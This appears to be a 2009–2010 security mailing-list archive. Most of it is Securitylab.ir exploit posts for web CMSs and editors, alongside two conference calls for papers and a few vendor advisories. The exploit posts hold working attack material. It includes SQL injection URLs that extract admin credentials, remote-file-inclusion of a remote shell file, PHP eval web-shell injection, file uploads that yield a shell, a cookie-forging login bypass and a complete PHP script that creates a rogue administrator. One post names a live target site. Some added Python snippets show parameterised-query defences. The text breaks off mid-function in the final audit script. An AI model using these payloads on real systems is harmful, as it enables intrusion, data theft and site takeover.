<form action="http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]%2b'/../db', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]%2b'|asa', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method="post" name="myform" enctype="multipart/form-data">
<p align="center">
<input type="file" name="uploadfile" size="100"><br><br>
<input type="submit" value="Upload">&nbsp;</p>
</form>


===
Arbitrary File Upload 2
===
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup


===
Database Disclosure
===
http://site.com/ewebeditor/db/ewebeditor.mdb 


===
Administrator bypass
===
http://site.com/eWebEditor/admin/login.asp

put this code instead URL
javascript:alert(document.cookie="adminpass="+escape("admin"));


===
Directory Traversal
===
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..


===
Directory Traversal 2
===
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..


#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###


RaakCms Multiple Vulnerabilities

2010-02-01 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: RaakCms
# Vendor: http://raakcms.com
#
Vulnerability:

===
Arbitrary File Upload
===
http://site.ir/webmaster/pic.aspx

Select a file and folder; your file is uploaded here:
http://site.ir/User_Images/[Folder]/FILE.ASPX


===
Directory Traversal
===
http://site.ir/browse.asp?dir=./..
http://site.ir/browseFile.asp?dir=./..

#
Live test: http://behzisty-kj.ir
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###


Microsoft IE 6 & 7 Crash Exploit

2010-01-26 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: Microsoft IE
# Version: 6 & 7
# Tested on : XP(SP1/SP2/SP3)
#
# Vulnerability Info:
# Type: Crash
# Risk: Medium
#
Vulnerability:

IE.html
<script>document.createElement("html").outerHTML</script>
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###


eWebeditor Directory Traversal Vulnerability

2010-01-21 Thread info
#
# Securitylab.ir
#
# Application Info:
# Name: eWebeditor
# Version: all version
#
# Vulnerability Info:
# Type: Directory Traversal
# Risk: Medium
#
# Vulnerability:
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###


QvodPlayer ColorFilter Codec ActiveX Remote Exec

2010-01-18 Thread info
###
# QvodPlayer ColorFilter Codec ActiveX Remote Exec
# Download : http://www.qvod.com
###
# Vulnerability:
# <object id="TestObj" classid="CLSID:{432F118C-DB79-4561-9799-CC95EA78208B}" style="width:100;height:350"></object>
###
# Tested on XpSP2 IE6/7
###
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
###


DBHCMS Web Content Management System v1.1.4 RFI Vulnerability

2009-12-28 Thread info
# Securitylab.ir
# Application Info:
# Name: DBHCMS Web Content Management System
# Version: 1.1.4
# Download: :(
#
# Discovered By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: admin[at]securitylab.ir & k4mr4n...@yahoo.com
#
# Vulnerability Info:
# Type: RFI (Remote File Inclusion)
# Risk: High
#===
# http://site.com/index.php?dbhcms_core_dir=http://site.com/shell.txt%00
# Need: register_globals = ON and allow_url_include = ON
#===
# Securitylab Security Research Team
###



QuahogCon Call for Papers

2009-11-03 Thread info

About QuahogCon

QuahogCon is a new regional conference for the hacker culture in all forms. 
Hardware, Software, Security, Social, Eco Hacking, Zero Impact Living. Like 
most hacker cons, it will run Friday to Sunday. We'll have two tracks: one for 
InfoSec topics and the other track will be a mix of all the other topics with a 
bit of an emphasis on hardware hacking and DIY electronics. Besides our 
perennial InfoSec favorites, we want to hear from some new voices on a wider 
range of topics. If it's a good hack, we want to hear what you're doing.

QuahogCon will be held April 23rd-25th, 2010 at Hotel Providence in Providence, 
RI

Call for Papers Opens today!

Come one, come all! Screw up your courage and get up to talk in front of a room 
full of folks at QuahogCon! We're a new conference in Providence, RI, looking 
to give you a place in the Northeast to present your ideas on Information 
Security and Maker Culture. We're here to encourage the hacker ethic in all its 
forms.

Conference Format

QuahogCon has two tracks:

* Information Security
* Maker Culture

Some topics may fit into both tracks, such as a hardware hack that exposes a 
security vulnerability. Choose one or both tracks when submitting your proposal 
and we'll figure it out when we make the schedule.

Information Security Track

We're looking for interesting presentations on new, original security research. 
It would be best to debut a whole new talk, but updates to existing recent work 
are perfectly acceptable, too. We're looking to hear from both new voices and 
the usual suspects. A minor amount of preference will be given to folks from 
the Northeast who have never presented at a con before, for whatever reason.

Maker Culture

Here's where things will get really crazy. This is a pretty inclusive track, so 
just about anything goes. Made a difference engine out of Reese's Peanut Butter 
Cups and Pixie Stix? We want to hear about it. Living in a commune with some 
friends, composting humanure and using it to grow the most incredible 
vegetables ever? We want to hear about it. Got a microcontroller project 
monitoring your personal methane production? We want to hear about it. We're 
expecting a lot of new voices in this track. Make yours one of them.

Talk Length

Some folks have a lot to say, others not so much. While we'll probably be 
tweaking the schedule right up to the wire, we'd like to give folks the option 
to do either 30 or 60 minute talks. If you can expand or compress your talk, 
feel free to choose both, as it will allow us more flexibility in scheduling. 
It is most likely that Sunday will be the 30 minute talk day, but we make no 
promises.

What we need from you

* Speaker name(s) and contact information.
* Presentation Title.
* Track preference and length (InfoSec or Maker, 30 or 60 minutes.)
* Keywords and 2-3 sentence abstract.
* Document in Text or PDF format which contains the following, preferably in 
order:
 o Presenter(s) Name.
 o Bio limited to 100 words for you OR your group (not 100 words per person.)
 o Abstract of your presentation limited to 200 words or less.
 o Detailed outline/description of your topic.
 o List of other conferences at which submission has been presented.
 o List of resources requested beyond what is already provided (power, 
projector with VGA input, sound projection, and internet connectivity.)

What you'll get for speaking

Accepted speakers will receive free admission to the conference. Since we're a 
brand new con, we don't have the funds for honorariums this year. We hope to be 
able to pull that off in the future. Alternates will be selected and will also 
receive free admission. Alternates should come prepared to speak.

Schedule and Updates

Please watch the website for updates: http://quahogcon.org/news/

November 2nd, 2009 - QuahogCon Call for Papers opens
December 15th, 2009 - Papers due for first round of selections
December 31st, 2009 - Final due date for submissions
January 24th, 2010 - Speaker selection announced

Submit your talk here: http://quahogcon.org/cfp/


PSArt v1.2 Sql Injection

2009-10-30 Thread info
## Securitylab.ir
# Application Info:
# Name: PSArt
# Version: 1.2
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# http://site.com/kxfzg/news.asp?id=128%20and%201=2%20union%20select%201,username,3,4,5,6,7,password,9%20from%20admin
#===
#
# Securitylab Security Research Team
###


PHP168 v6.0 rc

2009-10-28 Thread info
## Securitylab.ir 
# Application Info:
# Name: PHP168
# Version: 6.0
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# 
http://site.com/login.php?makehtml=1&chdb[htmlname]=seek.php&chdb[path]=cache&content=<?php...@eval($_POST[s]);?>
#===
#
# Securitylab Security Research Team
###


phpcms 2008 Remote File Disclosure Vulnerability

2009-10-19 Thread info
## Securitylab.ir 
# Application Info:
# Name: phpcms 2008
# Version: All
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Remote File Disclosure Vulnerability
# Risk: Medium
#===
# 
http://site.com/[path]/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=127.0.0.1&s=m/d=1
#===
#
# Securitylab Security Research Team
###


DEDECMS v5.1 Sql Injection Vulnerability

2009-10-13 Thread info
# Securitylab.ir
# Application Info:
# Name: DEDECMS
# Version: 5.1
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===
# feedback_js.php

$urlindex = 0;
if(empty($arcID))
{
    // $arcurl comes straight from the request and is pasted into the query
    $row = $dlist->dsql->GetOne("Select id From `...@__cache_feedbackurl` where url='$arcurl' ");
    if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) && empty($urlindex)) exit();
..
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
else $wq = " aid='$arcID' ";
// $wq, built from the unescaped values above, is interpolated a second time
$querystring = "select * from `...@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...

# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select ' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''=' from dede_admin where ''=
#===
#
# Securitylab Security Research Team
###
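The root cause in the feedback_js.php snippet above is string interpolation of `$arcurl` into the `where url='...'` clause. The following is an added example, not DEDECMS code: the same lookup modelled in Python with sqlite3, once as the page's string-built query and once with a bound parameter. The table names, the sample rows and the shortened payload are constructed for the demo.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed schema: the URL cache the page queries plus an admin table
    whose contents should never be reachable through the feedback lookup."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE cache_feedbackurl (id INTEGER PRIMARY KEY, url TEXT);
        CREATE TABLE admin (userid TEXT, pwd TEXT);
        INSERT INTO cache_feedbackurl (id, url) VALUES (7, 'http://example.test/a.html');
        INSERT INTO admin VALUES ('admin', 'constructed-password-hash');
    """)
    return db


def urlindex_unsafe(db: sqlite3.Connection, arcurl: str) -> Optional[str]:
    """Mirror of  "... where url='$arcurl'": the request value is pasted into SQL,
    so a quote in it ends the literal and the rest runs as SQL."""
    sql = f"SELECT id FROM cache_feedbackurl WHERE url='{arcurl}'"
    row = db.execute(sql).fetchone()          # GetOne(): first row or nothing
    return None if row is None else str(row[0])


def urlindex_safe(db: sqlite3.Connection, arcurl: str) -> Optional[str]:
    """Same lookup with a bound parameter: the input is only ever a URL value."""
    row = db.execute(
        "SELECT id FROM cache_feedbackurl WHERE url=?", (arcurl,)
    ).fetchone()
    return None if row is None else str(row[0])


# Constructed payload in the shape of the advisory's "' union select ..." URL,
# reduced to the single UNION needed to show the difference.
PAYLOAD = "' UNION SELECT pwd FROM admin WHERE ''='"

if __name__ == "__main__":
    db = make_db()
    print("legit  :", urlindex_unsafe(db, "http://example.test/a.html"))  # 7
    print("unsafe :", urlindex_unsafe(db, PAYLOAD))   # admin hash leaks
    print("safe   :", urlindex_safe(db, PAYLOAD))     # no such URL: None
```

The later `where $wq` clause in the snippet needs the same treatment, since `$urlindex` and `$arcID` are interpolated there as well.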



Various Orion application server example pages are vulnerable to XSS.

2009-09-08 Thread info
R08-08: Several XSS on Orion Application server 2.0 to 2.0.8

Vulnerability found: May 2008, revalidated 23 July 2009

Vendor informed: 27th July 09

Vulnerability fixed: 

Severity: Medium

Description: 

Various Orion application server example pages are vulnerable to XSS. Orion
application server is a Java-based web application server,
http://www.orionserver.com/.

Note: Orion application server was tested on Windows XP and JRE 1.6.0_14

The following demonstrate XSS:

1) http://10.0.2.177:8080/examples/jsp/sessions/carts.jsp?item=<body><script>alert(1)</script></body>&submit=add

2) http://10.0.2.177:8080/examples/jsp/checkbox/checkresult.jsp?fruit=<script>alert(1)</script>

3) http://10.0.2.177:8080/examples/jsp/cal/cal2.jsp?time=<script>alert(1)</script>

Consequences: 

An attacker may be able to cause execution of malicious scripting code in the
browser of a user who clicks on a link to an Orion Application server site. Such
code would run within the security context of the target domain. This type of
attack can result in non-persistent defacement of the target site, or the
redirection of confidential information (i.e.: session IDs) to unauthorised
third parties.

Fix:

Remove sample scripts from live environments.

References: 

http://www.procheckup.com/Vulnerabilities.php

Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)

Legal:

Copyright 2009 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet
community for the purpose of alerting them to problems, if and only if, the
Bulletin is not edited or changed in any way, is attributed to Procheckup, and
provided such reproduction and/or distribution is performed for non-commercial
purposes.

Any other use of this information is prohibited. Procheckup is not liable for
any misuse of this information by any third party.









DvBBS v2.0(PHP) boardrule.php Sql injection

2009-09-04 Thread info
## Securitylab.ir
# Application Info:
# Name: DVBBS (php)
# Version: 2.0
# Vendor: http://p.dvbbs.net
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===
# http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/
#===
#
# Securitylab Security Research Team
###


Admin News Tools 2.5 Remote File Download Vulnerability

2009-07-15 Thread info
# Securitylab.ir 
# Application Info:
# Name: Admin News Tools
# Version: 2.5
# Website: http://www.adminnewstools.fr.nf
# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
#===
# Download.php
# header('Content-Disposition: attachment; filename=' . basename($_GET['fichier']));
# readfile($_GET['fichier']);   // the raw GET value is read back with no path check
# }
#
# http://www.site.com/news/system/download.php?fichier=./../up.php
#===
#
# Securitylab Security Research Team
###


Empire Cms 5.1 sql injection

2009-06-30 Thread info
# Securitylab.ir
# Application Info:
# Name: Empire Cms
# Version: 5.1
# Download: http://www.phome.net/OpenSource/download/EmpireCMS_5.1os_SC_GBK.zip
#
# Discovered By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: admin[at]securitylab.ir & k4mr4n...@yahoo.com
#
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===
# http://site.com/e/tool/gbook/?bid=1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
#===
# Securitylab Security Research Team
###



dedecms v5.3 Arbitrary File Upload Vulnerability

2009-06-30 Thread info
# Securitylab.ir
# Application Info:
# Name: dedecms
# Version: v5.3
# Website: http://dedecms.com
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Arbitrary File Upload Vulnerability
# Risk: High
#===
# http://site.com/member/uploads_edit.php
# select a file and upload it
# file allowed : file.jpg.php
#===
#
# Securitylab Security Research Team
###







ecshop 2.6.2

2009-05-28 Thread info
# Securitylab.ir 
# Application Info:
# Name: ecshop
# Version: 2.6.2
# Website: http://www.ecshop.com
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: i...@securitylab[dot]ir & k4mr4n...@yahoo.com
#
#===
# :: integrate.php ::
#
# if ($_REQUEST['act'] == 'sync')
# {
#     $size = 100;
#     ..
#     $tasks = array();
#     if ($task_del > 0)
#     {
#         $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '</span>');
#         $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
#         $del_list = $db->getCol($sql);//$del_list
#     }
#     if ($task_rename > 0)
#     {
#         $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');
#         $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
#         $rename_list = $db->getAll($sql);//$rename_list
#     }
#     if ($task_ignore > 0)
#     {
#         $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
#         $ignore_list = $db->getCol($sql);//$ignore_list
#     }
#
#     // the lists are written as PHP source into a .php file under the data dir
#     $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
#     $log = '';
#     // isset() is also true for a request-supplied $del_list (register_globals),
#     // even when the branch above never ran
#     if (isset($del_list))
#     {
#         $log .= '$del_list=' . var_export($del_list,true) . ';';
#     }
#     if (isset($rename_list))
#     {
#         $log .= '$rename_list=' . var_export($rename_list, true) . ';';
#     }
#     if (isset($ignore_list))
#     {
#         $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
#     }
#     fwrite($fp, $log);
#     fclose($fp);
#     $smarty->assign('tasks', $tasks);
#     $smarty->assign('ur_here',$_LANG['user_sync']);
#     $smarty->assign('size', $size);
#     $smarty->display('integrates_sync.htm');
# }
#
#
# http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
# http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
 
#===
#
# Securitylab Security Research Team
###


LxBlog

2009-05-22 Thread info
# Securitylab.ir
# Application Info:
# Name: LxBlog
# Website: http://www.lxblog.net
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Sql/Xss
# Risk: Medium
#===
# Sql Injection:
# http://site.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid=1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
#
# Xss:
# http://site.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
#===
#
# Securitylab Security Research Team
###


DMXReady Registration Manager Arbitrary File Upload Vulnerability

2009-05-20 Thread info
# Securitylab.ir 
# Application Info:
# Name: DMXReady Registration Manager
# Version: 1.1
# Website: http://www.dmxready.com
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir  i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Arbitrary File Upload Vulnerability
# Risk: High
# Dork: inc_webblogmanager.asp
#===
# 
http://site.com/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp
# select a file and upload it
# view file : http://site.com/assets/webblogmanager/shell.aspx
#===
#
# Securitylab Security Research Team
###


Namad Cms Remote File Download

2009-05-19 Thread info
# Securitylab.ir 
# Application Info:
# Name: Namad
# Version: 2.0.0.0
# Website: http://imenafzar.com
#
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir  i...@securitylab[dot]ir
#
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
# Dork: Copyright 2008 ImenAfzar ver :2.0.0.0
#===
# http://site.ir/SecureDownloads.aspx?Mode=Downloads&Type=Files&FileName=../../Web.Config
#===
#
# Securitylab Security Research Team
###


maxcms2.0 creat new admin exploit

2009-05-13 Thread info
<?php

print_r('
+---+
maxcms2.0 creat new admin exploit
by Securitylab.ir
+---+
');

if ($argc < 3) {
print_r('
+---+
Usage: php '.$argv[0].' host path
host:  target server (ip/hostname)
path:  path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,1);
$cmd = 'm_username=securitylab'.$name.'&m_pwd=securitylab&m_pwd2=securitylab&m_level=0';

$resp = send($cmd);
// eregi() was removed in PHP 7; a case-insensitive substring test is the same check
if (stripos($resp, 'alert') === false) { echo "[~]bad!,exploit failed"; exit; }

print_r('
+---+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab'.$name.'/securitylab
+---+
');

function send($cmd)
{
global $host, $path;
// raw HTTP request built by hand; the Cookie header carries the SQL payload
$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: http://$host$path\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: securitylab\r\n";
$message .= "X-Forwarded-For:1.1.1.1\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
echo $message;

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
return $resp;
}
?>
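
The cookie in the script above carries a SQL fragment inside the manager name, and it only works because the application builds its lookup by pasting the cookie value into the query text. The Python/sqlite3 snippet below is an added example (not maxcms code, whose back end is ASP) contrasting that pattern with a parameterised lookup. The table and column names m_manager, m_username and m_level are taken from the cookie above; the schema, the two rows and the probe string are constructed for the demo.

```python
import sqlite3


# Constructed stand-in for the m_manager table named in the PoC cookie above.
# Table and column names mirror the page; the schema and the two rows are
# assumptions made for this example only.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE m_manager (m_username TEXT, m_level INTEGER)")
    conn.executemany("INSERT INTO m_manager VALUES (?, ?)",
                     [("admin", 0), ("editor", 1)])
    conn.commit()
    return conn


def lookup_vulnerable(conn, cookie_username):
    """Cookie value spliced straight into the SQL text.

    This is the pattern the PoC relies on: a quote in the cookie ends the
    string literal and whatever follows becomes part of the query.
    """
    sql = ("SELECT m_username, m_level FROM m_manager "
           "WHERE m_username='" + cookie_username + "'")
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, cookie_username):
    """Same lookup with a bound parameter; the cookie can only ever be data."""
    sql = "SELECT m_username, m_level FROM m_manager WHERE m_username=?"
    return conn.execute(sql, (cookie_username,)).fetchall()


def is_admin(rows):
    """The PoC's goal: be treated as an m_level 0 (administrator) manager."""
    return any(level == 0 for _, level in rows)


# A cookie value shaped like the one in the PoC: it closes the quote, UNIONs a
# fabricated admin row, and leaves the trailing quote to close the final literal.
PROBE = "nobody' UNION SELECT 'admin',0 FROM m_manager WHERE m_username='admin"


def demo():
    conn = build_demo_db()
    return {
        "vulnerable_rows": lookup_vulnerable(conn, PROBE),
        "vulnerable_is_admin": is_admin(lookup_vulnerable(conn, PROBE)),
        "hardened_rows": lookup_hardened(conn, PROBE),
        "hardened_is_admin": is_admin(lookup_hardened(conn, PROBE)),
        "hardened_normal": lookup_hardened(conn, "editor"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Beyond parameterisation, the deeper design point is that a cookie should carry an opaque, server-verified session identifier rather than the identity and privilege level the server then trusts: an m_level=0 cookie field is data the client controls.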


Call for Papers Hack.lu 2009

2009-05-04 Thread hack.lu 2009 info
Call for Papers Hack.lu 2009


The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implication of new technologies
in society. hack.lu is a balanced mix convention where technical and
non-technical people can meet each other and share freely all kinds of
information. The convention will be held in the Grand-Duchy of
Luxembourg in October 2009 (28-30.10.2009). The conference is three days
of active discussions, presentations and workshops for sharing
experience around new attacks, defensive techniques and information
security (including funky experiments). We would like to announce the
opportunity to submit papers, and/or lightning talk proposals for
selection by the hack.lu technical review committee. This year we will
be doing one hour talks, and some shorter talk sessions.


Scope:
--

Topics of interest include, but are not limited to:
- Software Engineering and Security
- Honeypots/Honeynets
- Spyware, Phishing and Botnets (Distributed attacks)
- Newly discovered vulnerabilities in software and hardware
- Electronic/Digital Privacy
- Wireless Network and Security
- Attacks on Information Systems and/or Digital Information Storage
- Electronic Voting
- Free Software and Security
- Assessment of Computer, Electronic Devices and Information Systems
- Standards for Information Security
- Legal and Social Aspect of Information Security
- Software Engineering and Security
- Security in Information Retrieval
- Network security
- Forensics and Anti-Forensics
- Mobile communications security and vulnerabilities


Deadlines:
--

The following dates are important if you want to participate in the CfP

Abstract submission: no later than 15 June 2009
Full paper submission: no later than 1st August 2009
Notification date: mid/end of August


Submission guideline:
-

Authors should submit a paper in English up to 5.000 words, using a
non-proprietary and open electronic format. The program committee will
review all papers and the author of each paper will be notified of the
result, by electronic means. Abstract is up to 400 words. Submissions
must be sent using the following interface: http://2009.hack.lu/papers/

Submissions should also include the following:
1. Presenter, and geographical location (country of origin/passport) and
contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important
tutorial.
6. Optionally, any samples of prepared material or outlines ready.
7. Whether or not the submission has already been presented, and where.

The information will be used only for the sole purpose of the hack.lu
convention including the information on the public website. If you want
to remain anonymous, you have the right to use a nickname.


Speakers' Privileges:
-

- Accommodation will be provided (3 nights).
- Travel expenses will be covered up to a max amount.
- Conference speakers night.


Publication and rights:
---

Authors keep the full rights on their publication/papers but give an
unrestricted right to redistribute their papers for the hack.lu
convention and its related electronic/paper publication.


Sponsoring:
---

If you want to support the initiative and gain visibility by sponsoring,
please contact us by writing an e-mail to info(AT)hack.lu


Web site and wiki:
--

http://2009.hack.lu/



HP Quality Center vulnerability

2009-02-23 Thread info
Find below the details of a vulnerability in the HP Quality Center product
(formerly Mercury Quality Center).

Introduction
--

Quality Center (QC) is a web-based QA testing and management tool. It is a
product from HP, which took over Mercury Interactive last year.

The front-end of the application is composed of COM components that plug into
the web browser. Quality Center provides a customization capability (called
workflow) which allows the administrator to modify the default behavior. This
workflow is driven by VBScript functions that are called whenever a particular
event occurs on the client front-end.

In order to optimize the interaction speed of the application, a cache folder
is created on the client machine. By default, this folder is located at
%tmp%/TD_80. Whenever a user connects to a Quality Center project, 2 folders
are created within the cache folder. One of these folders contains a copy of the
workflow scripts used to customize the application. Indeed, those files are
required on the client machine because the workflow is executed on the client,
not on the server.

There exists 1 VBScript workflow file per feature. Those are:
* Login/Logout (common.tds)
* Defects module (defects.tds)
* Manual Test Execution (manrun.tds)
* Test Requirements module (req.tds)
* Test Lab module (testlab.tds)
* Test Plan module (testplan.tds)

The customization feature of Quality Center is often used for:
* Controlling password compliance (no blank password, more than 8 letters, 
etc.)
* Chained lists (when a value is selected in a field, another field gets 
updated with a list relevant to that value)
* Automatic updates to some QC components (Test, Test Set, Defect objects, 
hidden fields)
* Hiding information depending on the user's group (used when a project is
shared with different vendors)
* Others

The workflow is often driven by using the OTA (Open Test Architecture), the 
Quality Center API. This API allows the manipulation of any QC object (e.g. 
Subject folder, Test/Defect objects, Fields, etc.). It also allows the direct 
manipulation of the database used by Quality Center.

Issue
---

When a user connects to Quality Center, the cache folder is automatically 
updated with the latest VBScript workflow files. Those files are then read by 
the QC front-end only once for the whole session. They are then used by the 
application whenever the associated events are raised.

There are 2 main points that make this workflow highly vulnerable:
1. Those files are written in plain text;
2. Marking those files as read-only (through the file properties) will 
prevent Quality Center from overwriting them.

If a user modifies this file and then marks it as read-only, he can execute
arbitrary code. As the OTA API allows access to the database, he can also
modify the data stored in the database as follows:
* Quality Center 9.2 (Unconfirmed)
  - Severity High: user has higher capability than defined by their
profile
* Quality Center 9.0 Patch < 17
  - Severity Highly Critical: a user (even with a Viewer profile) can
amend the data rendering it useless. He will also have higher capability than
defined by their profile
* Quality Center 8.2 / 8.0 (Unconfirmed)
  - Severity Highly Critical: a user (even with a Viewer profile) can
amend the data rendering it useless. He will also have higher capability than
defined by their profile
* TestDirector (Any Version)
  - TestDirector is the former name of Quality Center
  - Potentially the same issues as for Quality Center 9.0 Patch < 17

Please note that HP has released a patch that fixes this issue; please contact
HP support for further details.

Example
-------

This really short example shows how a user can simply change the content of all
the defects to some meaningless values:

Sub Defects_Bug_MoveTo
    Set objCommand = TDConnection.Command
    objCommand.CommandText = "UPDATE BUG SET BG_SUMMARY='Useless', BG_DESCRIPTION='Useless'"
    objCommand.Execute
End Sub

Other Information
-

Discovered By: Exposit Limited
Internet:http://www.exposit.co.uk

Exposit Limited is a functional testing consultancy company specialized in HP
(formerly Mercury) Testing Tools.
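
Since the weakness described above hinges on a cached workflow script that has been edited locally and then locked read-only, an audit of the client cache is a reasonable compensating check while the HP patch is rolled out. The Python script below is an added example, not part of Exposit's advisory or of any HP tooling: it builds a constructed TD_80-style cache tree (the project folder names, file contents and reference hashes are all assumptions), then flags every .tds file that is read-only or whose SHA-256 differs from what the server would have issued.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# The six workflow files the post lists, one per Quality Center feature.
WORKFLOW_FILES = ("common.tds", "defects.tds", "manrun.tds",
                  "req.tds", "testlab.tds", "testplan.tds")


def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def build_sample_cache(root):
    """Construct a TD_80-style cache tree for the demo (not real QC data).

    Two project folders get identical, server-issued workflow files; in the
    second one defects.tds is then edited locally and marked read-only, which
    is exactly the condition the post describes.  Returns the tree root and
    the SHA-256 values the server copies would have.
    """
    root = Path(root)
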